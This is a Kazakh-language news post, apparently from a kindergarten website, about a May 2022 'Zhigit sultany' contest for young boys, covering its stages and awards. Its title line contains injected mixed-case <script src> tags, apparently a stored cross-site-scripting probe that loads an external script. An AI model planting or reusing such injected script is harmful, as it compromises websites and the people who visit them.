Жігіт сұлтаны-2022<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.05.2022

2022 жылы мамырдың 6-шы  жұлдызында МКҚК  "Ақбота"(Циалковский  көшесі 10)  бөбекжайында "Болашаққа бағдар рухани жаңғыру бағдарламасы" аясында 7-мамыр Отан қорғаушылар мерекесі орай қазақ тілi мұғалімі Гульнар  Кабдылсадыққызының  ұйымдастырумен  «Жiгiт сұлтаны - 2022" сайысы өткізілді. Мақcаты: Ата салтын насихаттай отырып, нағыз қазақ жiгiтiнiң бойындағы қасиеттерімен таныстыру. Әр баланың бойындағы қабілеттірiн: ойлау, әр түрлі жағдайлардан шыға бiлу, өнер көрсету, тапқырлық, сахна мәдениетiн қалыптастыру.

​Сайыс төрт кезеңде өткізілдi. 1-шi бөлім "Тегімдi менiң сұрасаң..."

2-шi бөлiмде "Жiгiтке жетi өнер аз, жетпiс өнер көп емес" өнер сайысы.

3-шi бөлiм "Өнерлiге өрiс кең, қол өнер" үй тапсырмасы.

4-шi бөлiм "Ақылына күші сай" сайыскерлердiң ұлттық ойындар сайысы.

 ,, Сегiз қырлы, бiр сырлы дегендей, бiздiң бүлдіршін жiгiттер  өздерінің өнерлерiн жақсы көрсете бiлдi. "Жiгiт сұлтаныны-2022" байқауының қортындысы бойынша сайыскерлердiң ақыл - парасаты мен өнеріне, қайраты мен күшіне баға беруші қазылар алқасы әр жiгiтерiмiзге өз  өнерiн көрсеткенi үшін ,, Бурабай сұлтаны"," Тапқыр жiгiт", " Ептi жiгiт"," "Өнерлі жiгiт","Сымбатты жiгiт" атты номинацияларымен марапатталып сыйлықтар табысталды.

Бәйге түсіп жарыспай.

Жүйріктiң бағы жанар ма,

Бiлiм мен өнер жарысы

Тәрбие тәлім талаппен!,- деп айтқандай, болaшақта бiздiң бүлдіршін жiгiтерiмiзге сәттiлiк тiлей отыра, әрқашанда биіктен көріне беруге жазсын!

Просмотров: 285


Пікір қосу



Деректерді қолтаңбаға қосу